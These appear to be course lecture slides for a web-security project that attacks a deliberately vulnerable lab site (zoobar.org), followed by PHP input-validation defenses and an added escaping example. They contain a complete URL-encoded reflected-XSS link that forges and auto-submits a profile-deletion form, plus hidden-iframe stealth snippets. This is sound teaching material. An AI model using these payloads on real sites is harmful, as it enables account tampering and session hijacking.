Spring 2006 CS 155 Project 2: Web App Security Collin Jackson Deadlines Part 1 Attacks.

Spring 2006
CS 155
Project 2: Web App Security
Collin Jackson
1
Deadlines
2
Part 1
Attacks
3
Overview
• Explore several attack types
• Requires both effectiveness and stealth
Learn:
• How an attacker can evade sanitization
• Consequences of an exploit
• JavaScript
• Very basic CSS
4
Attacks
Attack A: Cookie Theft
  • Use URL encoding
  • Could hijack session
  (Diagram labels: link, zoobar.org, email)
Attack B: Silent Transfer
  • Navigate browser
  • Use iframes, forms
  (Diagram labels: badguy.com)
Attack C: Login Snooping
  • Evade sanitization
  • Handle DOM events
  (Diagram labels: zoobar.org, stanford.edu)
Attack D: Profile Worm
  • Confuse site scripts
  • Replicate
  (Diagram labels: badguy.com, zoobar.org, email)
5
JavaScript
Browser scripting language with C-like syntax
Sandboxed, garbage collected
Closures
var x = 3; var y = function() { alert(x); }; return y;
Encapsulation/objects
function X() { this.y = 3; } var z = new X(); alert(z.y);
Can interpret data as code (eval)
Browser-dependent
6
Invoking JavaScript
Tags: <script>alert('Hello world!')</script>
Links: javascript:alert('Hello world!')
  • Wrap code in "void" if it has a return value
Event handlers:
<form onsubmit="alert('Hello world!')">
<iframe onload="alert('Hello world!')">
CSS (IE only)
<style>body { background: url(javascript:alert('Hello world!')); }</style>
7
DOM Manipulation Examples
document.getElementById(id)
document.getElementsByTagName(tag)
document.write(htmltext)
document.createElement(tagname)
document.body.appendChild(node)
document.forms[index].fieldname.value = …
document.formname.fieldname.value = …
frame.contentDocument.getElementById(id)
8
Arrays and Loops
Example: Change href of all links on a page
var links = document.getElementsByTagName('a');
for (var i = 0; i < links.length; i++) {
  var link = links[i];
  link.href = "javascript:alert('Sorry!');";
}
9
Other Useful Functions
Navigation
  • document.location
  • document.formname.submit()
  • document.forms[0].submitfield.click()
Delayed Events
  • node.addEventListener(eventname, handler, useCapture)
  • node.removeEventListener(eventname, handler, useCapture)
  • window.setTimeout(handler, milliseconds)
10
Stealthy Styles
var node = document.getElementById("mynodeid");
node.style.display = 'none';       // may not load at all
node.style.visibility = 'hidden';  // still takes up space
node.style.position = 'absolute';  // not included in flow
document.write(                    // can also write CSS rules to page
  "<style>#mynodeid { visibility:hidden; }</style>");
11
Example: Profile Deleter
Malicious hyperlink deletes profile of user who clicks it
Only works when user logged in
  • User might have multiple tabs open
  • Might have chosen/forgotten not to log out
  • Might appear in another user's profile
Uses vulnerability in users.php from Attack A
Constructs profile deletion form and submits it
12
Find vulnerability
Site reflects query parameter in input field
Link can include anything we want here
13
Copy form data
View source to find form fields
Create copycat form with our modifications
14
URL encode
Close previous <input>, <form>
Button click triggers form submit
15
Debugging
It didn't work.
Open JavaScript console
Check error: Undefined. No properties!
Two forms with same name
16
Fixed version
Now with correct form
17
Final Test
http://zoobar.org/users.php?user=%22%3E%3C%2Fform%3E%3Cform%20method%3D%22POST%22%20name%3Dprofileform%0D%20%20action%3D%22%2Findex%2Ephp%22%3E%0D%3Ctextarea%20name%3D%22profile%5Fupdate%22%3E%3C%2Ftextarea%3E%3Cbr%2F%3E%0D%3Cinput%20type%3Dsubmit%20name%3D%22profile%5Fsubmit%22%20value%3D%22Save%20Profile%22%3E%3C%2Fform%3E%0D%3Cscript%3Edocument%2Eforms%5B1%5D%2Eprofile%5Fsubmit%2Eclick%28%29%3C%2Fscript%3E
users.php replaced with index.php
Profile deleted
18
Stealthier approaches
Post form into hidden iframe
<form name=F action=/index.php target=myframe>…
<iframe name=myframe style="visibility:hidden">…
Open page with form in hidden iframe
<iframe name=myframe style="visibility:hidden">…
<script>document.myframe.contentDocument.forms[0].profile_update.value = "";</script>
19
Part 2
Defenses
20
Goals
Little programming knowledge can be a dangerous thing
Learn:
• How easy it is to make mistakes
• That even simple code can be hard to secure
• Techniques for appropriate input validation
• PHP
• Very basic SQL
21
PHP: Hypertext Preprocessor
Server scripting language with C-like syntax
Can intermingle static HTML and code
<input value=<?php echo $myvalue; ?>>
Encapsulation/objects
class X { var $y = 3; } $z = new X(); echo $z->y;
Can embed variables in double-quote strings
$user = "world"; echo "Hello $user!";
or $user = "world"; echo "Hello " . $user . "!";
Form data in global arrays $_GET, $_POST, …
22
SQL
Widely used database query language
Fetch a set of records
SELECT * FROM Person WHERE Username='grader'
Add data to the table
INSERT INTO Person (Username, Zoobars) VALUES ('grader', 10)
Modify data
UPDATE Person SET Zoobars=42 WHERE PersonID=5
Query syntax (mostly) independent of vendor
23
File structure
Only edit these files:
  index.php
  users.php
  transfer.php
  login.php
includes/
  • auth.php (cookie authentication)
  • common.php (includes everything else)
  • navigation.php (site template)
db/
  • zoobar/
    • Person.txt (must be writable by web server)
Includes /usr/class/cs155/projects/pp2/txt-db-api/…
24
txt-db-api
Third-party text file database library
Data can be int, string, and autoincrement
Need to escape strings: \' \" \\
Actually magic_quotes_gpc does this for us
$recipient = $_POST['recipient']; // already escaped
$sql = "SELECT PersonID FROM Person WHERE Username='$recipient'";
$rs = $db->executeQuery($sql);
if ($rs->next())
    $id = $rs->getCurrentValueByName('PersonID');
25
Defenses to Part 1
Attack A: Cookie Theft
Attack B: Silent Transfer
Attack C: Login Snooping
Attack D: Profile Worm
26
Sanitization Techniques
addslashes(string)
  • Already done by magic_quotes_gpc
  • Inverse: stripslashes(string)
htmlspecialchars(string [, quote_style])
  • Converts & < > " to HTML entities
  • Use ENT_QUOTES to change ' to &#039;
strip_tags(string [, allowable_tags])
  • Max tag length 1024
  • Does not sanitize tag attributes
preg_replace(pattern, replacement, subject)
More info: http://php.net
27
More XSS hunting
Look for untrusted input used as output
Note sanitization already applied to each variable
  • Form data has magic_quotes_gpc, db data does not
Determine browser context for output
  • Inside a quoted string within a tag – worry about ' "
  • Outside a tag – worry about < >
  • Input to eval – very dangerous
Sanitize the output if necessary
  • No penalty for erring on the side of caution
  • But sanitizing multiple times may lead to problems
No credit for solving non-goals: SQL injection, etc.
28
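Putting the PHP, txt-db-api, sanitization and XSS-hunting slides together, as an added example that is not code from the deck or the zoobar site: it undoes magic_quotes_gpc once on the way in, then escapes once on the way out, in the syntax of the context the value lands in. The helper names (request_value, h, sql_str, valid_amount) are hypothetical; the field and column names (user, Username, PersonID) and the payload shape come from the slides.

```php
<?php
// Added example, not code from the CS 155 slides or the zoobar site.
// Idea: bring request data into ONE canonical (unescaped) form, then
// escape exactly once, in the syntax of the context it is written into.

// Undo magic_quotes_gpc (2006-era PHP) so form data and txt-db-api data
// look identical to the rest of the code. Guarded because the function
// no longer exists in PHP 8.
function request_value(array $src, $key, $default = '') {
    if (!isset($src[$key]) || !is_string($src[$key])) {
        return $default;
    }
    $v = $src[$key];
    $magic = function_exists('get_magic_quotes_gpc') && @get_magic_quotes_gpc();
    return $magic ? stripslashes($v) : $v;
}

// HTML context (text or a quoted attribute). ENT_QUOTES is what matters for
// the users.php reflection: inside value="..." a bare " or ' would close
// the attribute and let the rest of the payload become markup.
function h($s) {
    return htmlspecialchars($s, ENT_QUOTES);
}

// SQL string literal for txt-db-api, which wants \' \" \\ escaped.
// Applied here, at the query, and nowhere else, so double escaping cannot
// happen when magic_quotes_gpc is also on.
function sql_str($s) {
    return "'" . addslashes($s) . "'";
}

// Whitelist validation rather than sanitization for transfer.php amounts:
// accept only a string of digits that parses to a positive integer.
function valid_amount($s) {
    return is_string($s) && ctype_digit($s) && (int)$s > 0;
}

// Constructed input shaped like the profile-deleter payload on slide 18.
$fake_get = array('user' => '"></form><form name=profileform>');
$user = request_value($fake_get, 'user');

// The attribute stays closed: every " < > becomes an entity.
echo '<input name="user" value="' . h($user) . '">' . "\n";

// The quotes inside the value are escaped for the text database.
echo 'SELECT PersonID FROM Person WHERE Username=' . sql_str($user) . "\n";

// Only the first of these is accepted.
var_dump(valid_amount('10'), valid_amount('-1'), valid_amount('1e3'), valid_amount(10));
```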
Good luck!
Start early
Ask questions
Be creative
29